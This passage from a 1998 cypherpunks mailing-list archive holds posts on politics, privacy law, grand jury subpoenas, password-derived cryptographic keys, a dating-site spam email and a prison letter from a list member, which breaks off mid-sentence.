Pork-barreling is grotesquely distorting the direction
of the dollars actually appropriated to the services,
in a spirit well exemplified by the latest budget from
Congress. Meanwhile, America's armed forces are
more and more diverted into "peacekeeping" and
domestic policing, subjected to the egalitarian
schemes of social engineers, and systematically
alienated from civilian society. "The lack of a strong
military leads only to its more frequent use," former
secretary of the Navy John Lehman points out.
"America needs forces that are recruited, trained,
and directed to do not social services, not
international welfare, not peacekeeping, not drug
interdiction, but to rain fire and destruction on our
enemies if they break the peace and seek to attack
us and our close allies. ... The armed services are
not just another branch of the civil service." Lehman
warns against the misuse of the services for
diplomacy or in domestic law enforcement
(including drug interdiction). His prescription for the
rehabilitation of the military includes restoring the
warrior culture of the forces, eliminating politically
correct double standards, redressing the
civil-military imbalance, and reducing the pork.
Somebody had better start listening to him. 

E - The People 

"If your car is swallowed up by a pothole the size of
Poughkeepsie, E - The People can help you find the
person you need to tell about it," claims this
community-affairs Web service's front page. Click
on "streets," enter your address, and they'll identify
your public works commissioner -- and see that
your complaint reaches his or her office, even if that
office isn't on the Internet (they'll convert your email
to a fax). Lots of Web sites offer "easy" access to
federal or state officials, but not many provide on
this nitty-gritty local level. The site sometimes slows
down at busy times, so use patience. 

The CSPI health crackpots are at it again 

This time it's soda pop that they're warning you is
the devil's instrument. They want it banned from
schools, taxes placed on its sale, and an end put to
ads for it that target children. When are these
querulous suburban Savonarolas' fifteen minutes
going to be over? Methinks I detect a certain
cooling toward them even now: wonder of
wonders, the AP actually noticed this time that they
"offered little scientific evidence" for all their dire
claims of damaging effects. But I'm not really
optimistic; there'll always be a market for scare
stories with a moralistic cherry on top.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 09:37:49 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: capitalism run amuck by Korton (fwd)
Message-ID: <199810280126.TAA10565@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Oct 1998 09:28:56 -0500
> From: Soren <sorens@workmail.com>
> Subject: Re: capitalism run amuck by Korton

> is that there is a distinct difference between capitalism in a free market,
> and the kind of corporate-capitalism that the world is enmeshed in now.

corporate-capitalism? Is that church-religion? Spin doctorism.

The problem is that economics have social effects and by extension it has
responsibilities along with them. We've allowed monetary interests drive our
government instead of issues of true civil liberties.

This should not be implied that this has *ever* been true. The Constitution
starts out talking about creating a 'more perfect' union. It's a goal we
should be striving for.  The founding fathers knew they couldn't fulfill it,
they knew their children wouldn't do it. They did believe that latter
generations could achieve it. We haven't fallen from grace, and the
politicians are probably not any more corrupt, because we never had it. If
democracy fails it's because *WE* failed.

The problem with free-markets is they give up all pretext to being imperfect
and claim to be *the* answer. But at they same time it completely ignores an
entire group of aspects of business operation and asks us to ignore them too.

> The former allows for the free exchange of value based upon the participants
> understanding of that value.

That pretty much excludes Jews & Arabs, etc....

> concepts such as "natural wealth", "legal tender", "zero sum economies"

Who in their right mind compares our economy to a zero sum economy?

> <P>An assumption is made that I fundamentally disagree with -- democracy
> is the holy grail of human social intercourse.&nbsp; Never, in recorded

It's not the holy grail but there isn't another system with anywhere the
potential for fulfilling human desires with a minimum of abuse and overhead.

Perhaps it would be simpler to simply admit the obvious and clearly state
that we no longer have a democratic system.

> history, has democracy existed without the support of client slave states/populations.&nbsp;

Well considering the world didn't pop out of a test tube but evolved over
time this argument holds little weight. The point *is* that democratic
system hold the best model we know of to date. Our particular twisted model
of it fails, that doesn't mean theory failed. It's one of the reasons I
always chuckle at those who say the fall of the CCCP meant the fall of
communism. What a maroon.

> but its a whisper in a propaganda hurricane,&nbsp; The US is not a democracy,
> it is a republic. For those of you who don't know the difference; a democracy
> puts everything up for grabs, including your life, liberty and the pursuit
> of happiness, while a republic provides 'certain inalienable rights', similar
> to those&nbsp; currently being alienated by the Klinton Kongressional Klan.

Um, actualy that is incorrect. A democracy is a system whereby the rules of
the system are determined by interaction of the population at the individual
level through a vote or other representitive mechanism. A republic is one
(sic) that uses a Senate (an elected body of individuals supposedly held in
high esteme, usualy two or more acting together) as that representative
mechanism. There are actualy many different mechanisms that are usable in a
democratic system.

Another thing is that in a Democracy there isn't a need for a Bill of Rights
since all participants are considered rational. The founding fathers had
useful insite when they appended that document under protest. The problem
with applying any political system is the 'shall not' and similar phrases.

What is the most interesting to me is that there is absolutely no reason to
have a President. There is nothing other than historical status quo that
individuals need to be the leaders of countries. Washington knew this when
he refused to be addressed as "Your Highness". It's a representation of
mass human psychology.

> <BR>to realise that under capitalism, democracy is now for sale to the
> highest

If so then it's only because we can't garner the support to pass an
amendment. If the problem is that serious and wide spread it should be put
to a vote and noted as an amendment. What simply amazes me is why neither
the pro- or con- side of the gun debate ever brings this up. This whole
issue could potentialy be solved by have the competing camps create two
amendments and submit them to the houses in the individual states.
Justification for this is pursuant (untested) in the fact that the people
are given a right to redress of grievances. Since the law prohibits
individuals from suing the government unless some weird permission is
obtained then the next best alternative would be direct submission of
potential amendments directly into the state legislatures. The people have a
right to change the law via constitutional amendment unfettered by federal
intervention or regulation. This would be a simple and expedient process with
email being what it is...

> <BLOCKQUOTE TYPE=CITE>is treated as progress. The world is now ruled by
> a global financial casino staffed by <U>faceless </U>bankers and hedge
> fund speculators who operate with a <U>herd mentality</U> in the <U>shadowy</U>
> world of global finance.</BLOCKQUOTE>

And you want to turn these folks loose in an economy with no regulation (ie
free-market)?

> <BR>details of our president's sex life and calls for his impeachment for
> lying
> <BR>about an inconsequential affair.

Ok, so next time I have to speak under oath for a traffic ticket it's ok if
I lie too? How about a murder trial? How about *your* murder trial?

Anyone who doesn't understand the implications of a class based legal system
in a democracy is lost in the ozone...

I'm gonna stop now, this is entirely too long an initial troll and I don't
have the time to go through it further.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 09:49:27 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Right of privacy
Message-ID: <199810280135.TAA10758@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
> Date: Mon, 26 Oct 1998 11:23:47 +0100
> Subject: Re: An amendment proposal...

> Your scope of privacy seems to be rather narrow.

True enough. I figured if I kept typing I'd probably get into trouble with
somebody. Besides I just wanted to start a discussion for a couple of days
distraction.

There are many aspects of the various characteristics and I don't pretend to
be able to imagine them in all their combinatorial splendor.

One thing I know is that the social potential for video cameras in relation
to traffic management are immense. The problem is that their potential for
abuse when coupled with other sorts of technologies is absolutely
frightening. I don't believe that potential is enough to avoid them out of
hand.

> It is not only communication.
> Privacy is also needed on public places (e.g., violated by face recognition systems), 
> at work places (e.g.,violated by telephone tapping), for your body (e.g., endangered by 
> abortion control),

No, what is needed in public places is anonymity. We want to be treated just
like everyone else. We specificaly don't want any identity.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 28 Oct 1998 10:26:55 +0800
To: cypherpunks@toad.com
Subject: MIB Subpoena 3
In-Reply-To: <4.0.2.19981027112335.03c0c840@panix.com>
Message-ID: <199810280149.UAA09356@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We've received word of a third Grand Jury subpoena in 
CJ's case. With a request to not publicize the person and 
information sought. Yep, we tried to prize it loose, citing
Gilmore's model, but no go.

Word from that person is that the trial is expected to begin 
in mid-November, which could indicate that CJ's evaluation 
will be completed shortly.

Interest in attending is picking up. We've had requests to
keep several folks informed on dates of court activity.

All we got so far is the Nov 10 date on John Gilmore's Grand
Jury subpoena and the mid-Nov trial start. So any info is most 
welcome.

BTW, has anyone seen news reports on CJ's case other than
those of Declan? If so, we'd like pointers or copies.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Webpersonals <help@webpersonals.com>
Date: Wed, 28 Oct 1998 10:18:06 +0800
To: cypherpunks@Algebra.COM
Subject: You won't want to miss this!
Message-ID: <199810280146.UAA27379@webpersonals.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi, CYPHERPUNKS!

We are pleased to announce that we have made several big improvements
to Webpersonals (Avenia, Womanline and Manline) since your last
visit.

The biggest and best of our upgrade, we call "Happy Hour". Our new
Happy Hour Ticket allows you to enjoy one full hour of uninterrupted
instant messaging with other members online anytime, at a big
savings.

In fact, for a limited time, we are currently offering a special
Bonus Offer which wil allow you to try Happy Hour FREE!

While our Bonus Offer lasts, you will receive FREE Happy Hour Ticket(s)
with any purchase package. If you decide to purchase now, you will not
lose your current Credits. Your new purchase package plus FREE Happy Hour
Ticket(s) will be added to your account for you to use at any time.

PLUS... our Search function is now twice as powerful! Finding that
special someone is faster, easier and more convenient with the
new "saved search" function. Residents of North America can also
search within a specified distance, allowing them to locate member
in as broad or as specific a range as they wish.

And finally, we have added two new user-friendly payment options.
Try our toll-free 1-888 fax payment line, or phone our Telephone
Payment Line with your credit card information. It's quick and
easy to order Credit and Ticket packages over fax or phone.All
charges will appear under "Interactive Media USA" on your credit
card statement.

If you have forgotten your Secret ID and password, here they are:
  Secret ID: CYPHERPUNKS
  Password:  CYPHERPU

PLEASE NOTE: You may have experienced difficulty connecting to
www.avenia.com.  We are having some technical difficulties with
this domain and ask that you use www.webpersonals.com until further
notice. Thank you.

The Staff of Webpersonals 
http://www.webpersonals.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 11:11:47 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: MIB Subpoena 3 (fwd)
Message-ID: <199810280255.UAA11299@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 27 Oct 1998 20:41:07 -0500
> From: John Young <jya@pipeline.com>
> Subject: MIB Subpoena 3

> We've received word of a third Grand Jury subpoena in 
> CJ's case. With a request to not publicize the person and 
> information sought. Yep, we tried to prize it loose, citing
> Gilmore's model, but no go.

> Word from that person is that the trial is expected to begin 
> in mid-November, which could indicate that CJ's evaluation 
> will be completed shortly.

> All we got so far is the Nov 10 date on John Gilmore's Grand
> Jury subpoena and the mid-Nov trial start. So any info is most 
> welcome.

My subpeona date was the 18th, changed from the 19th. Something changed in
their time table. Possible pressure from some front?

> BTW, has anyone seen news reports on CJ's case other than
> those of Declan? If so, we'd like pointers or copies.

Nada.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John" <needshelp@mindspring.net>
Date: Wed, 28 Oct 1998 12:27:09 +0800
To: <cypherpunks@toad.com>
Subject: lotus notes id file
Message-ID: <000001be0217$6a534ce0$0a07020a@jbivins>
MIME-Version: 1.0
Content-Type: text/plain



Hello
	I'm using lotus notes and I have a big problem. I have a id file with no
password. How can I get a password for it or reset it. Is there some type of
utility or something someone knows of?I have been told that I'm out of luck
unless I have the original.


John...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Birch <daveb-lists@mail.hyperion.co.uk>
Date: Wed, 28 Oct 1998 06:58:54 +0800
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and   Sending the Wizards Back to Menlo Park
Message-ID: <1302592959-147251835@hyperion.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Vin McLellan said Bob Hettinga said

>>It's biometric
>>*identity* which is the problem

Actually, I would have thought that biometric revocation is the problem!

Cheers,
Dave Birch.

=== mailto:daveb@hyperion.co.uk ===== http://www.hyperion.co.uk/ ===




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Renegade <renegade@texoma.net>
Date: Wed, 28 Oct 1998 22:16:58 +0800
To: <xasper8d@lobo.net>
Subject: Re: Airline ID Checking (was: RE: your mail)
In-Reply-To: <19981027190715.184.rocketmail@send101.yahoomail.com>
Message-ID: <3.0.5.32.19981027223012.007bd4e0@texoma.net>
MIME-Version: 1.0
Content-Type: text/plain



At 12:44 PM 10/27/1998 -0700, X wrote:
>Does anyone know what the airlines do with the info they collect off the ID?
>Are they just noting whether the names match, or is it more sinister?

This has nothing to do with security. They are checking to make sure the
name matchs the ticket. Airlines like to think their tickets are
non-transferable, and they use this method to make sure john doe did not
buy the ticket from joe shmoe.

-Renegade




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 28 Oct 1998 15:26:02 +0800
To: cypherpunks@Algebra.COM>
Subject: Re: EU Privacy Directive
In-Reply-To: <19981019195132.27759.rocketmail@send1e.yahoomail.com>
Message-ID: <3.0.5.32.19981027225259.00b81e10@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:39 AM 10/20/98 +0200, Theodor.SCHLICKMANN@bxl.dg13.cec.be wrote:
>Those who are affected in the first place are US companies who
>are used to collect and process personal data from their customers
>without any embarrassment. They will be excluded from
>the European market, if they do not follow European Data
>Protection rules. 
>
>Until now the US goverment has decided to leave this matter 
>to self regulation. However, US industry did not manage to 
>come up with an appropriate codex. 

The big problem in the US isn't the government's failure to
tell big companies what protection to provide for their transactions -
it's their insistence on adding more and more requirements 
that businesses, especially banks, and local governments,
collect and retain information that makes data correlation simpler,
and creation of database systems that collect more information.
The most common are the requirement for SSNs as a tax-collection ID
for banks and employers, and the use of the SSN for Medicare
making it simplest for medical insurance companies to use it as an ID.
Then of course there's the near-universal requirement for
collecting SSNs in return for drivers' licenses,
and "deadbeat dad databases" that require employers to register new employees
in government databases, even those of us who are neither dads nor deadbeats.
Once all your transactions have personal identifiers on them,
it's nearly trivial to track everything that you do.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 28 Oct 1998 08:14:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Using a password as a private key.
Message-ID: <199810272341.AAA20410@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



RedRook@yahoo.com writes:
> Assymetic crypto systems such as Diffie-Hellman, El-Gamel, and DSS,
> allow the private key to be a randomly chosen number. But, as a cute
> hack, instead of using a random number, for the private key, you could
> use a hash of the User Name, and a password.
> 
> Doing so allows the users to generate their private key on demand.
> They don't have to store the private key, and if they want to work on
> a another computer, they don't need to bring along a copy.  Has any one
> tried this? Is there existing software that does this? Any comments on
> the security of such a scheme?  The only draw back that I can think of
> is the potential lack of randomness in the key. If the user chooses a
> bad password, it would be possible to brute force the public key.

You can accomplish the same thing by encrypting your private key (including
RSA) with a passphrase and publishing it.

Because of the problems with passphrase bruting, it probably only
makes sense to do this with a machine-generated passphrase which has
guaranteed entropy.  Something like: "Aarhous mocrader Fals paca rate
portion wiserustingned" has a guaranteed > 128 bits of entropy, which
should be enough for most purposes.  Probably with an hour's study most
people could memorize such a passphrase.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 29 Oct 1998 17:06:06 +0800
To: RedRook <cypherpunks@toad.com
Subject: Re: Using a password as a private key.
In-Reply-To: <19981027215307.3786.rocketmail@send1d.yahoomail.com>
Message-ID: <3.0.5.32.19981028012129.008334d0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
James Donald's "Crypto Kong" system http://catalog.com/jamesd/Kong/ does this.
It uses Diffie-Hellman and ElGamal crypto over Elliptic Curves,
so it can get away with relatively short keys, 240-255 bits.
The secret key is hashed from your passphrase (and/or a keyfile*) 
Your public key is generated from the secret key and a generator.

Because the public keys can be short, there are some real conveniences.
You don't need to distribute big clunky keys in a keyserver;
255 bits is just 43 characters of base-64, so you can put it in 
your mail signatures and on your business cards.

Kong takes an interesting approach to key certification and signatures -
it doesn't use the "True Name" model with a Certificate Authority Trusted 
Third Party Subject To Many Government Regulations certifying that
the person who has this key has that True Name.
Instead, you sign messages, and it keeps a database of signed messages from people,
and you can compare a message you have with a message you've received 
previously to see if it's signed by the same key, and you can 
send encrypted messages to the person who sent you a previous message.  
If you want to do the equivalent of signing a key,
you just sign a message including someone else's message, 
maybe adding commentary (which is hard to do in PGP.)  Here's an example:
	-- 2
	Dear Carol
	I've known Bob for a long time, and he's probably not an FBI plant.
	Here's a copy of his business card.  Alice
    	--
	Bob Dobbs, Sales, PO Box 140306, Dallas TX 75214    
	http://subgenius.com/bigfist/pics2/logoart/dobbs3x45.GIF
	--digsig
         Bob
	F9KBGIfyizpoyo8i8NS/Dqe/eP4WVNcXcRJuS14QPXn
	N9Cm/pDw8sgVDMj8f3upNmp1pSE3rSj0atQuF7Jt
	4RgxEDpUxK1DVzBejpH3qqvrqcY2+8M+pSXFB0LLG
	--digsig
         Alice
	9Xjp1N+QDtXR9Mw1S0gJTnwliGM3rQpuzdogeqOLqii
	ckd5NlB2nGrQHe4TSMSDd791WEq64XCotsYG0oiZ
	4W3Yi4QBCgYC0SnORJFesTOcbCsmGsEnXZRCVrsou

and you can go compare Alice's signature with the one
she gave you at the Prop 215 Bake Sale.

On the other hand, "work on another computer" is a dangerous phrase.
If it's another of _your_ computers, fine, but otherwise
how do you trust that the copy of Kong or PGP or whatever
you're running is the real thing, or that it's not saving your passphrase
from the keyboard driver, or all the usual threats.
Those threats are somewhat true with your own computer,
but there you not only have some control over the machine,
you know that if Bad Guys have cracked it, your data is hosed anyway :-)

[ * The Kong keyfile of might-as-well-be-random bits which gives you entropy, 
and makes the system usable in environments where passphrases aren't convenient,
such as unattended batch mail decryption done in remailers.
You can either use just the passphrase, use just the keyfile, or use both.]

At 01:53 PM 10/27/98 -0800, RedRook <redrook@yahoo.com> wrote, approximately,
>Asymmetric crypto systems such as Diffie-Hellman, El-Gamal, and DSS, 
>allow the private key to be a randomly chosen number. But, as a cute hack, 
>instead of using a random number, for the private key, you could use 
>a hash of the User Name, and a password. 
>
>Doing so allows the users to generate their private key on demand.
>They don't have to store the private key, and if they want to work on
>another computer, they don't need to bring along a copy.
>Has any one tried this? Is there existing software that does this? Any
>comments on the security of such a scheme? 
>The only draw back that I can think of is the potential lack of
>randomness in the key. 

    --digsig
         Bill Stewart <bill.stewart@pobox.com>
     3k3eg3jOiy57hhibcg9SkKVwkCUw7ivtVjJBm2E0WIC
     1IidMTkWR0QwVsOPeyEgQ7wdKKVtka99jziuLfOs
     4VIpwv6kNvAPJdk49JEtprvCnxTBrNSyViHqgxqGc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 28 Oct 1998 09:49:20 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810280113.CAA28308@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



[Two letters received by fax on 27 October 1998]

----------

[Letter 1, cover and 16 pages]

8 September 1998

Cover Sheet

Declan

The Good News is that I have a pen to write
with, due to the Free Enterprise System being
alive & well within the Prison System.

The Bad News is that Micro$oft Pens (TM)
controls 95% of the market...

I am hoping you can share as much of this
communique as possible with the CPUNX,
since my chain is constantly getting yanked
in different directions, making outside contact
sporatic & unreliable.

Feel free to reserve for your own use any
of the enclosed information you need for your
own journalistic purposes.

I will try to reach you by phone (automated
collect-call system requiring touch-tone on
your end).

Thanks for the Mags,

                     CJ Parker

ps# My prison cell mirror now reads,
"Chocolate Skelter." (Brownie & Milk)

------------------------------------------------

[FLORENCE NUTLY NEWS - "I'M HERE BECAUSE I
believe that the KONTROLLERS are taking
actions that create obstacles to the freedom
and openess of the Internet. ~Truth Glaser]

Declan,

Looks like you may be receiving the *only* copy
of the Florence Nutly News, since I have, up
until now, been writing on paper towels and
medicine cups, using combinations of blood,
sperm and chocolate (two of which are in short
supply) for ink, and I will soon be headed
to Nutly News Head (pardon the pun) Quarters
in Springfield, Missouri, for Rewiring of
my Brain Circuity.

Although I was well-prepared for my
arrest - wearing my "Linda Lou & the Drifters"
T-shirt, as promised, having spent several days
getting Baby Truth Mongrel settled into a [illegible
--------------]: grabbing my Evidence Bag
[illegible ---] two containers of medication
[illegible ---] the knock on the door on the
other side of town - I found myself totally
unprepared for the experience of being thrown
into a KafkaEsque KonsPiracy [illegible].

I will admit to having told a few whoppers
in my time, mostly on fishing trips, but
my arm cannot stretch far enough to
describe the Immensity of The Plot (TM) to
crap on every right and freedom that most
Americans 'think' they have, in order to bring
me - like a Chained Mad Dog - to a Governmental
Pre Destined End at the hands of the American
Judicial and Prison System.

Although I have not yet lost my mind
(I predict by Thursday at the latest), and I
know that the Whole World (TM) is not
*really* involved in The Plot (TM) against me,
everything since my arrest has proceeded
as if this were exactly the case.

I shit you not...

A thread on the CPUNX Distrubed Male
LISP that I followed with interest had to do with
the Ratio of Consciously Conspiring Cocksuckers to
Robotic Moronic Techtronics in the current
Death March to Analog Digital Battan.

i.e. Hettinga's (?) tagline = "Do not
attribute to conspiracy that which can be
explained by stupidity..." (~misquote?)

As my ^ Pre Destined (<- Cro-Magnon Editing)^ 
Imprisonment and my March
Toward Justice began to unfold, I was at
first struck by the banal predictability
of the Dehumanizing <-> Brainwashing that
takes place as the Identity and Persona of
an Individual is "Committed to The Custody Of"
the Kontrollers (TM).

I watched as the concerns of Outsiders
Becoming Insiders switched from which
Telco offered the best services? -> when am I
allowed to use the phone?, etc., ad infinitum,
until an Inside Lifer being transferred
from a different prison asked only a single
question upon his arrival - a question
which strikes terror into the heart and mind,
(of the Outside Lifer), who know that, stripped
of the Toys & Trappings (TM) that the Kontrollers
"allow" them to have to distract them from
the reality of their true status in life, there is
really only a single question that truly
matters, whether one is moving to an Insider
Feeding Pen or an Outside Feeding Pen:

   "How is the food?"

Paris or Auchwitz - Danube or Dachau,
Just tell me one thing, Fritz - "How is the chow?"

The KONSCIOUSLY KONSPIRING KRIMINAL
element of the TREASURY Agents was just
as predictable as the mechanical, fixed cogs
of The System Machinery.

- Charging me with a crime that would
  enable them to put a bug in the ear of
  every human element of the Judicial
  [illegible] System from the Judge -> the
  Prison Guard - "This man is using
  his writing and the Internet as a
  weapon to murder government
  officials and authority figures (such
  as yourself!)."

- Telling the prison medical staff things
  designed to label me as a violent, psychotic
  [???]-freak.

- Going through the motion of 'discovering'
  evidence that they were already full aware
  of as a result of previous legal and
  illegal surveillance & investigation.

"[Illegible ------------------------------]"

The previous, of course, is merely an
indication that the Conscious Conspiracies
of Analog Human Goals & Desire for
Power/Control is present "alongside of"
the "Stupidity" of a mechanized version of
digitized cogs designed to automatically
categorize, shape and standardize those
individual Elements & Entities that the
Puppet Masters place on Conveyor Belts leading
to the Educational System, Employment System,
Judicial System, etc.

The observation, made by various of the
CypherPunks on the LISP, as well as portions
of Space Aliens Hide My Drugs, which dealt
with the intimations of coercion and
brainwashing manipulation in the
treatment of Jim Bell at the hands of the
Justice System, were partly conjecture
due to a lack of detail on Bell's full
situation & treatment.

As a result of my research on the subject,
my previous life experience, and my 
current situation, I feel semi-qualified
to express the opinion that I am being
subjected to CLASSIC/TEXTBOOK BRAINWASHING
TECHNIQUES, combining physical deprivation
and disorientation with the witholding of
proper medical treatment and physical
coercion to accept 'new' diagnoses and
'new' medication designed to meet the needs
of the Prison & Judicial System, rather than
to meet my own medical needs.

e.g. - Denying me clothing, bedding, personal
items, services available to other inmates,
etc. offering me access to my reading glasses
if I stop exhibiting symptoms of Tourette
Syndrome, for which I have been diagnosed
and treated by a variety of physicians and
specialists for years.

I will not go into the 2-3 pages of notes I
have made documenting the above, since nabbed,
like a whiner, and Lord Knows, I have abused
myself more over the years through my own
craziness and stupidity, than those fuckers
could ever hope to accomplish.

The point I wold like to make to the CypherPunks

is that the TOTALITY of the persecution, oppression,
censorship, conspiracy - or whatever you
want to label it - that is being directed toward
me is GREATGER THAN > the Sum of the Robotic Moronic
Techtronics PLUS the Consciously Conspiring CockSuckers

  [This is even 'after' taking into account my
  spitting in a US Treasury Agent's eye and
  writing 'Helter Skelter' in my own blood
  on a prison mirror.]

I find myself sitting in a prison cell in
Middle America, looking at a Prison Commissary
sheet which confirms my suspicion that the
prison meals are designed to market a
variety of condiments, such as mayo and
picante sauce, to the most Captive
Consumers of all.

I find myself reflecting on the similarities
between a friend, whose 'Health Coverage' does
not seem to apply to any disease he might get, and
to my own experience of having Prison Medical
Personnel state, "We don't have those medications
in here," and knowing, instinctively, that
I am just going to have to 'choose' a disease
they had medication for, or just go
fuck myself.

I find myself reflecting on the
Techno BioSemiotic Evolution of
a self-sustaining Corrections CORPORATION
of America system which has Little Johnny
hustling to sell more Crack, so that his Daddy
can buy condiments to make his prison food
more palatable, eventually getting busted
and sent to prison, putting his younger
brother, Raoul, in the Corrections CORPORATION
food chain as a Crack salesperson & future Inmate/
Consumer.

I find myself peering down a Tunnel
Through Time and seeing that the "Dark Forces"
spoken of in the 'The Xenix Chainsaw Massacre', in
Part I of The True Story of the InterNet, were,
and are, just as real as the "Dark Clouds
Gathering Over Europe" during the Rise of the
Third Reich - with the Dark Clouds being formed
by the Industrial BioSemiotic Progeny of the
Marriage of the Rumbling of the Tanks with the
Shouting and Cheering of the Masses at the
Nazi Rallies - and with the Dark Forces being
formed by the Technological BioSemiotic
Progeny of the Marriage of the Silence of the
Computers with the Silence of the Lambs, as
they wait quietly in line to fill out their
local supermarket 'Nickle Off On A Can of Beans
Discount Card,' listing their InterNet Email
address so that the Kontrollers can use the new
J. Edgar Digital Hoover Vacume Technology to
suck the Sheeple's brains onto the Digital
Cattle Cars, taking them behind the Electro Magnetic
Curtain, where they can be fed a bland diet
of Brain food designed to sell them condiments,
such as HBO and the TIME Digital Supplement,
as Prisoners of the Electronic Corrections Corporation
of Planet Terra.

Whoa, Trigger!

Every time I get on a roll, I seem to
roll a little cloer to Springfield...

Anyway, for anyone interested in the status
of my legal situation, I believe my status
can be best described by the use of a variety
of expletives which don't have a snowball's
chance in Hades of making it past the Censor,
but which involves bending over and
touching one's ankles.

The problem, of course, is that the
GRAND PLAY OF JUSTICE has already been
written, and there is no role available for
the Defendant.

The Problem (TM) is that I, unlike those
who have brought the charges against me,
want to take this case to trial.

At my original court appearance, I elected
to represent myself.

The Judge took it upon herself to appoint
a Public Defender to "assist" me. I immediately
translated "assist" to "Sell You Down The
Fucking River!" (Mentally envisioning the
PD as "supporting" me by having me stand on
his shouldeer as the noose was placed around
my neck.)

Just before my second court appearance
the PD introduced himself and told me it was a
pretty routine "Motion to Remove" hearing/
"Identity" hearing, and that I would then be
sent to Seattle.

I informed him that if they WANTED me to go
to Seattle immediately, then I wanted to fight it.
The PD left, and returned later with the news
that the Feds had just sprung a "Complaint" on him
that he was unaware of and the he would need
a couple of weeks to deal with it. I had him
read a short portion of the Complaint and, recognizing
it as identical to a recent 'gift' I had received,
I told the PD that, since the Feds now seemed to
want a delay, that I was ready to proceed.

In court the PD informed the Judge that
*he* needed time to "study the Complaint" (run up
his bill) and that *I* had trouble following
his logic (wanted to proceed with what he
had already told me was a routine, 'slam-
dunk for the government' matter anyway).

So, everyone compared their Tee Times
with local golf courses and decided that I
would rot in Jail for two weeks while they
tired to correct their slice.

Of course, the day before the two weeks
is up, I receive a letter the Judge's
Public Defender Bum Buddy, containing
Order 98-02824M, stating that "The defense
had made an oral motion..." (Funny, I thought
that 'I" was the Defense) ... "for psychiatric
evaluation ... asserting that the Defendant
cannot communicate/particiapte..."

In other words, the lawyer (whom Shakespeare
would shoot first) paddled over to the Judge to
have me shipped off to Dr. Frankenstein's
Funny Farm, while I, upstream from
Tucson (with 'no paddle') am setting and
wondering how the Grand Canyon State produces
so many Amateur Medical Genius' who are
able to perform an in depth medical diagnosis  of
an individual after speaking with them for
lkess than five minutes - total.

  [The Prison Medical Staff spending half of that time
  in a room full of people carrying Walkie Talkies,
  asking me whether or not I heard voices...]

However, if your Heart of Hearts is tempted
to Bleed Purple Piss for me, stuff a rag in it,
because I've been telling people form the beginning
that the GuberMint would be sending me off
for mental ReClassfication.

The Bottom Line (TM) is that the Complaint
seems to amount to - once the smoke & mirrors
are cleared away - one Entertainment BOT
and one anonymous email 'authenticated' by
what I suspect will trun out to be a a
Communal 'Magic Circle' PGP digital
signature.

(Worst Case Scenario - I will be forced,
in open court, for the first time ever,
